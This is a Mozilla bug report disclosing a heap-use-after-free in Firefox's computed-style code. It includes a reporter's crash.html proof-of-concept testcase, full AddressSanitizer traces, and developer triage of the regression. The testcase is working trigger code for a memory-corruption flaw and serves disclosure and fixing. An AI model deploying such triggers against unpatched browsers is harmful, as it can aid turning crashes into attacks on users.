heap-use-after-free in nsComputedDOMStyle::UpdateCurrentStyleSources

VERIFIED FIXED in Firefox -esr52

Status


defect
VERIFIED FIXED
2 years ago
9 months ago

People

(Reporter: nils, Assigned: emilio)

Tracking


58 Branch
mozilla58
Bug Flags:
sec-bounty +

Firefox Tracking Flags

(firefox-esr5257+ verified, firefox56 wontfix, firefox57+ verified, firefox58+ verified, firefox59 verified)

Details

(Whiteboard: [adv-main57+][adv-esr52.5+][post-critsmash-triage])

Attachments

(4 attachments)

Reporter

Description

2 years ago
Posted file crash.html
The following testcase crashes the latest ASAN build of Firefox (BuildID=20171026221048)

crash.html:
<script>
// Synchronous XHR: spins a nested event loop inside the listener, so timers
// belonging to the freshly opened window (paint suppression, see the "freed by"
// stack below) can fire before getComputedStyle() returns.
function spin() {
    var x = new XMLHttpRequest();
    x.open("POST", "https://mozilla.org", false);
    x.send("X");
}
function start() {
    // Popup whose pres shell is still the initial about:blank one.
    o1 = window.open('x', 'p6', 'height=0');
    o3 = document.documentElement;
    o7 = document.createElement('marquee');
    o3.addEventListener('DOMAttrModified', fun0);
    o3.appendChild(o7);
    // getComputedStyle on the popup for an element of the opener document:
    // flushing the opener runs fun0 while the popup's pres shell pointer is
    // already cached, and that shell is torn down during the nested event loop.
    o1.getComputedStyle(o3).color;
}
function fun0() {
    spin();
}
</script>
<body onload="start()"></body>

ASAN output:
=================================================================
==10774==ERROR: AddressSanitizer: heap-use-after-free on address 0x62200003f110 at pc 0x7f067e63da87 bp 0x7fff53791690 sp 0x7fff53791688
READ of size 8 at 0x62200003f110 thread T0 (file:// Content)
    #0 0x7f067e63da86 in get /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:287:27
    #1 0x7f067e63da86 in operator nsPresContext * /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:300
    #2 0x7f067e63da86 in GetPresContext /builds/worker/workspace/build/src/obj-firefox/dist/include/nsIPresShell.h:254
    #3 0x7f067e63da86 in nsComputedDOMStyle::UpdateCurrentStyleSources(bool) /builds/worker/workspace/build/src/layout/style/nsComputedDOMStyle.cpp:978
    #4 0x7f067e63e161 in nsComputedDOMStyle::GetPropertyCSSValue(nsTSubstring<char16_t> const&, mozilla::ErrorResult&) /builds/worker/workspace/build/src/layout/style/nsComputedDOMStyle.cpp:1165:3
    #5 0x7f067e63bd48 in nsComputedDOMStyle::GetPropertyValue(nsTSubstring<char16_t> const&, nsTSubstring<char16_t>&) /builds/worker/workspace/build/src/layout/style/nsComputedDOMStyle.cpp:479:26
    #6 0x7f067e63bb58 in nsComputedDOMStyle::GetPropertyValue(nsCSSPropertyID, nsTSubstring<char16_t>&) /builds/worker/workspace/build/src/layout/style/nsComputedDOMStyle.cpp:415:10
    #7 0x7f067aba3396 in GetColor /builds/worker/workspace/build/src/layout/style/nsCSSPropList.h:1439:1
    #8 0x7f067aba3396 in mozilla::dom::CSS2PropertiesBinding::get_color(JSContext*, JS::Handle<JSObject*>, nsDOMCSSDeclaration*, JSJitGetterCallArgs) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/CSS2PropertiesBinding.cpp:12880
    #9 0x7f067c34b156 in mozilla::dom::GenericBindingGetter(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2909:13
    #10 0x7f06829577f0 in CallJSNative /builds/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
    #11 0x7f06829577f0 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:473
    #12 0x7f06829597c5 in InternalCall /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:522:12
    #13 0x7f06829597c5 in Call /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:541
    #14 0x7f06829597c5 in js::CallGetter(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:656
    #15 0x7f06838ea68c in CallGetter /builds/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2119:16
    #16 0x7f06838ea68c in GetExistingProperty<js::AllowGC::CanGC> /builds/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2172
    #17 0x7f06838ea68c in NativeGetPropertyInline<js::AllowGC::CanGC> /builds/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2375
    #18 0x7f06838ea68c in js::NativeGetProperty(JSContext*, JS::Handle<js::NativeObject*>, JS::Handle<JS::Value>, JS::Handle<jsid>, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2411
    #19 0x7f068339776c in GetProperty /builds/worker/workspace/build/src/js/src/vm/NativeObject.h:1601:12
    #20 0x7f068339776c in JS_ForwardGetPropertyTo(JSContext*, JS::Handle<JSObject*>, JS::Handle<jsid>, JS::Handle<JS::Value>, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2707
    #21 0x7f067c34339f in mozilla::dom::GetPropertyOnPrototype(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::Handle<jsid>, bool*, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2096:10
    #22 0x7f067aaeecb6 in mozilla::dom::CSS2PropertiesBinding::DOMProxyHandler::get(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::Handle<jsid>, JS::MutableHandle<JS::Value>) const /builds/worker/workspace/build/src/obj-firefox/dom/bindings/CSS2PropertiesBinding.cpp:65860:8
    #23 0x7f068361ec20 in getInternal /builds/worker/workspace/build/src/js/src/proxy/Proxy.cpp:353:21
    #24 0x7f068361ec20 in js::Proxy::get(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::Handle<jsid>, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/proxy/Proxy.cpp:363
    #25 0x7f068296225b in GetProperty /builds/worker/workspace/build/src/js/src/vm/NativeObject.h:1600:16
    #26 0x7f068296225b in GetProperty /builds/worker/workspace/build/src/js/src/jsobj.h:806
    #27 0x7f068296225b in js::GetProperty(JSContext*, JS::Handle<JS::Value>, JS::Handle<js::PropertyName*>, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:4393
    #28 0x7f0682944c98 in GetPropertyOperation /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:219:12
    #29 0x7f0682944c98 in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2786
    #30 0x7f068292a14a in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:423:12
    #31 0x7f06829578ef in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:495:15
    #32 0x7f06829587e2 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:541:10
    #33 0x7f068339d16b in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jsapi.cpp:3020:12
    #34 0x7f067bd697e5 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:260:37
    #35 0x7f067c761e1d in Call<nsISupports *> /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:362:12
    #36 0x7f067c761e1d in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /builds/worker/workspace/build/src/dom/events/JSEventHandler.cpp:215
    #37 0x7f067c72ab46 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1118:51
    #38 0x7f067c72cd12 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1293:20
    #39 0x7f067c70c3f1 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:462:16
    #40 0x7f067c70f8c2 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:822:9
    #41 0x7f067e9cf5ce in nsDocumentViewer::LoadComplete(nsresult) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1064:7
    #42 0x7f06819eaafa in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7759:21
    #43 0x7f06819e6b24 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7557:7
    #44 0x7f06819ee37f in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7454:13
    #45 0x7f0679638ba3 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1320:3
    #46 0x7f0679637d0c in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:861:14
    #47 0x7f0679634d98 in nsDocLoader::DocLoaderIsEmpty(bool) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:750:9
    #48 0x7f0679636cb2 in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:632:5
    #49 0x7f067963790c in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:488:14
    #50 0x7f0677bc7c40 in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:629:28
    #51 0x7f067a7f8f9d in nsDocument::DoUnblockOnload() /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:9331:18
    #52 0x7f067a7f8b61 in nsDocument::UnblockOnload(bool) /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:9253:9
    #53 0x7f067a7d2c39 in nsDocument::DispatchContentLoadedEvents() /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:5645:3
    #54 0x7f067a84bf72 in applyImpl<nsDocument, void (nsDocument::*)()> /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1142:12
    #55 0x7f067a84bf72 in apply<nsDocument, void (nsDocument::*)()> /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1148
    #56 0x7f067a84bf72 in mozilla::detail::RunnableMethodImpl<nsDocument*, void (nsDocument::*)(), true, (mozilla::RunnableKind)0>::Run() /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1192
    #57 0x7f06779f0f01 in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:396:25
    #58 0x7f0677a15f26 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1037:14
    #59 0x7f0677a303e8 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:513:10
    #60 0x7f0678802281 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:97:21
    #61 0x7f06787627bb in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #62 0x7f06787627bb in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #63 0x7f06787627bb in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #64 0x7f067e176c7f in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:158:27
    #65 0x7f06826a8e97 in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:877:22
    #66 0x7f06787627bb in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #67 0x7f06787627bb in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #68 0x7f06787627bb in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #69 0x7f06826a884a in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:703:34
    #70 0x4ec2de in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:63:30
    #71 0x4ec2de in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:280
    #72 0x7f069532582f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #73 0x41dbc8 in _start (/fuzzer3/firefox/firefox+0x41dbc8)

0x62200003f110 is located 16 bytes inside of 5768-byte region [0x62200003f100,0x622000040788)
freed by thread T0 (file:// Content) here:
    #0 0x4bc0fb in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:47:3
    #1 0x7f067e8cd67e in mozilla::PresShell::Release() /builds/worker/workspace/build/src/layout/base/PresShell.cpp:841:1
    #2 0x7f067e9d712b in assign_assuming_AddRef /builds/worker/workspace/build/src/obj-firefox/dist/include/nsCOMPtr.h:355:7
    #3 0x7f067e9d712b in operator= /builds/worker/workspace/build/src/obj-firefox/dist/include/nsCOMPtr.h:631
    #4 0x7f067e9d712b in nsDocumentViewer::DestroyPresShell() /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:4645
    #5 0x7f067e9c754c in nsDocumentViewer::Destroy() /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1752:5
    #6 0x7f067e9d8fae in nsDocumentViewer::Show() /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:2089:17
    #7 0x7f067ea69deb in nsPresContext::EnsureVisible() /builds/worker/workspace/build/src/layout/base/nsPresContext.cpp:2241:31
    #8 0x7f067e8ef353 in mozilla::PresShell::UnsuppressAndInvalidate() /builds/worker/workspace/build/src/layout/base/PresShell.cpp:3892:54
    #9 0x7f067e8da167 in UnsuppressPainting /builds/worker/workspace/build/src/layout/base/PresShell.cpp:3935:5
    #10 0x7f067e8da167 in mozilla::PresShell::sPaintSuppressionCallback(nsITimer*, void*) /builds/worker/workspace/build/src/layout/base/PresShell.cpp:1861
    #11 0x7f0677a35196 in nsTimerImpl::Fire(int) /builds/worker/workspace/build/src/xpcom/threads/nsTimerImpl.cpp:701:7
    #12 0x7f0677a071f6 in nsTimerEvent::Run() /builds/worker/workspace/build/src/xpcom/threads/TimerThread.cpp:286:11
    #13 0x7f06779f0f01 in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:396:25
    #14 0x7f0677a15f26 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1037:14
    #15 0x7f0677a303e8 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:513:10
    #16 0x7f067dfb9f57 in SpinEventLoopUntil<mozilla::ProcessFailureBehavior::ReportToCaller, (lambda at /builds/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.cpp:3106:31)> /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:323:25
    #17 0x7f067dfb9f57 in mozilla::dom::XMLHttpRequestMainThread::SendInternal(mozilla::dom::BodyExtractorBase const*) /builds/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.cpp:3106
    #18 0x7f067dfbb77c in mozilla::dom::XMLHttpRequestMainThread::Send(JSContext*, mozilla::dom::Nullable<mozilla::dom::DocumentOrBlobOrArrayBufferViewOrArrayBufferOrFormDataOrURLSearchParamsOrUSVString> const&, mozilla::ErrorResult&) /builds/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.cpp:2935:11
    #19 0x7f067bb89f7f in mozilla::dom::XMLHttpRequestBinding::send(JSContext*, JS::Handle<JSObject*>, mozilla::dom::XMLHttpRequest*, JSJitMethodCallArgs const&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/XMLHttpRequestBinding.cpp:1249:9
    #20 0x7f067c34d570 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3040:13
    #21 0x7f06829577f0 in CallJSNative /builds/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
    #22 0x7f06829577f0 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:473
    #23 0x7f0682942447 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:528:12
    #24 0x7f0682942447 in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3067
    #25 0x7f068292a14a in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:423:12
    #26 0x7f06829578ef in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:495:15
    #27 0x7f06829587e2 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:541:10
    #28 0x7f068339d16b in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jsapi.cpp:3020:12
    #29 0x7f067bd6c7c7 in mozilla::dom::EventListener::HandleEvent(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, mozilla::ErrorResult&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventListenerBinding.cpp:47:8
    #30 0x7f067c72ab0c in HandleEvent<mozilla::dom::EventTarget *> /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventListenerBinding.h:65:12
    #31 0x7f067c72ab0c in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1115
    #32 0x7f067c72cd12 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1293:20
    #33 0x7f067c70c6ba in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:486:14
    #34 0x7f067c70f8c2 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:822:9
    #35 0x7f067c6deaba in mozilla::EventDispatcher::DispatchDOMEvent(nsISupports*, mozilla::WidgetEvent*, nsIDOMEvent*, nsPresContext*, nsEventStatus*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:891:12
    #36 0x7f067a8c20b1 in nsINode::DispatchEvent(nsIDOMEvent*, bool*) /builds/worker/workspace/build/src/dom/base/nsINode.cpp:1337:5

previously allocated by thread T0 (file:// Content) here:
    #0 0x4bc44c in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:64:3
    #1 0x4ed85d in moz_xmalloc /builds/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:84:17
    #2 0x7f067a7bf033 in operator new /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:206:12
    #3 0x7f067a7bf033 in nsDocument::CreateShell(nsPresContext*, nsViewManager*, mozilla::StyleSetHandle) /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:4137
    #4 0x7f067e9c9e1f in nsDocumentViewer::InitPresentationStuff(bool) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:684:27
    #5 0x7f067e9c96ef in nsDocumentViewer::InitInternal(nsIWidget*, nsISupports*, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, bool, bool, bool) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:942:10
    #6 0x7f067e9c8957 in nsDocumentViewer::Init(nsIWidget*, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:659:10
    #7 0x7f06819e459b in nsDocShell::SetupNewViewer(nsIContentViewer*) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:9552:7
    #8 0x7f06819e2f5c in nsDocShell::Embed(nsIContentViewer*, char const*, nsISupports*) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7376:17
    #9 0x7f06819f19d8 in nsDocShell::CreateAboutBlankContentViewer(nsIPrincipal*, nsIURI*, bool, bool) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:8250:14
    #10 0x7f067a477cd5 in nsGlobalWindow::SetInitialPrincipalToSubject() /builds/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:2605:18
    #11 0x7f06826045b6 in nsWindowWatcher::OpenWindowInternal(mozIDOMWindowProxy*, char const*, char const*, char const*, bool, bool, bool, nsIArray*, bool, bool, nsIDocShellLoadInfo*, mozIDOMWindowProxy**) /builds/worker/workspace/build/src/toolkit/components/windowwatcher/nsWindowWatcher.cpp:1117:18
    #12 0x7f06826099df in OpenWindow2 /builds/worker/workspace/build/src/toolkit/components/windowwatcher/nsWindowWatcher.cpp:444:10
    #13 0x7f06826099df in non-virtual thunk to nsWindowWatcher::OpenWindow2(mozIDOMWindowProxy*, char const*, char const*, char const*, bool, bool, bool, nsISupports*, bool, bool, nsIDocShellLoadInfo*, mozIDOMWindowProxy**) /builds/worker/workspace/build/src/toolkit/components/windowwatcher/nsWindowWatcher.cpp:416
    #14 0x7f067a4c7145 in nsGlobalWindow::OpenInternal(nsTSubstring<char16_t> const&, nsTSubstring<char16_t> const&, nsTSubstring<char16_t> const&, bool, bool, bool, bool, bool, nsIArray*, nsISupports*, nsIDocShellLoadInfo*, bool, nsPIDOMWindowOuter**) /builds/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:12911:21
    #15 0x7f067a4c571f in OpenJS /builds/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:8966:10
    #16 0x7f067a4c571f in nsGlobalWindow::OpenOuter(nsTSubstring<char16_t> const&, nsTSubstring<char16_t> const&, nsTSubstring<char16_t> const&, mozilla::ErrorResult&) /builds/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:8928
    #17 0x7f067a4c5bad in nsGlobalWindow::Open(nsTSubstring<char16_t> const&, nsTSubstring<char16_t> const&, nsTSubstring<char16_t> const&, mozilla::ErrorResult&) /builds/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:8937:3
    #18 0x7f067babfc23 in mozilla::dom::WindowBinding::open(JSContext*, JS::Handle<JSObject*>, nsGlobalWindow*, JSJitMethodCallArgs const&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/WindowBinding.cpp:2192:56
    #19 0x7f067babdf85 in mozilla::dom::WindowBinding::genericMethod(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/WindowBinding.cpp:15335:13
    #20 0x7f06829577f0 in CallJSNative /builds/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
    #21 0x7f06829577f0 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:473
    #22 0x7f0682942447 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:528:12
    #23 0x7f0682942447 in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3067
    #24 0x7f068292a14a in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:423:12
    #25 0x7f06829578ef in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:495:15
    #26 0x7f06829587e2 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:541:10
    #27 0x7f068339d16b in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jsapi.cpp:3020:12
    #28 0x7f067bd697e5 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:260:37
    #29 0x7f067c761e1d in Call<nsISupports *> /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:362:12
    #30 0x7f067c761e1d in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /builds/worker/workspace/build/src/dom/events/JSEventHandler.cpp:215
    #31 0x7f067c72ab46 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1118:51
    #32 0x7f067c72cd12 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1293:20
    #33 0x7f067c70c3f1 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:462:16
    #34 0x7f067c70f8c2 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:822:9
    #35 0x7f067e9cf5ce in nsDocumentViewer::LoadComplete(nsresult) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1064:7

SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:287:27 in get
==10774==ABORTING
Reporter

Comment 1

2 years ago
Posted file ASAN output
David: This doesn't look Stylo-related. Any idea who should own this?
Group: core-security → layout-core-security
Flags: needinfo?(dbaron)
Is this reported against a build with bug 1406750 fixed or not?

In general, the date-based buildid is not nearly as useful as the actual changeset id from about:buildconfig in answering questions like that...
Assuming this is reported against rev aa958b29c149, that is with bug 1406750 fixed...
INFO: Last good revision: c7db33cbe5ded3c342ef672c5da366b2e1ff1b0f
INFO: First bad revision: ece6798a15ba1a94c497166142dc84e74a157471
INFO: Pushlog:
https://hg.mozilla.org/integration/autoland/pushloghtml?fromchange=c7db33cbe5ded3c342ef672c5da366b2e1ff1b0f&tochange=ece6798a15ba1a94c497166142dc84e74a157471

Confirmed that Beta and ESR52 also crash.
Has Regression Range: --- → yes
Nils, can you confirm the changeset you used for this build? (and note Boris's comment that that would be more useful than the date in the future).
Flags: needinfo?(nils)
Keywords: regression
Assignee: nobody → emilio
Building now... I bet the up-front flush is killing mPresShell... The "cool" part is that I suspect this bug was already there before the patch (just more tricky, since it required getComputedStyle to be called inside a ::first-line or something like that, I believe).
(In reply to Emilio Cobos Álvarez [:emilio] from comment #7)
> Building now... I bet the up-front flush is killing mPresShell... The "cool"
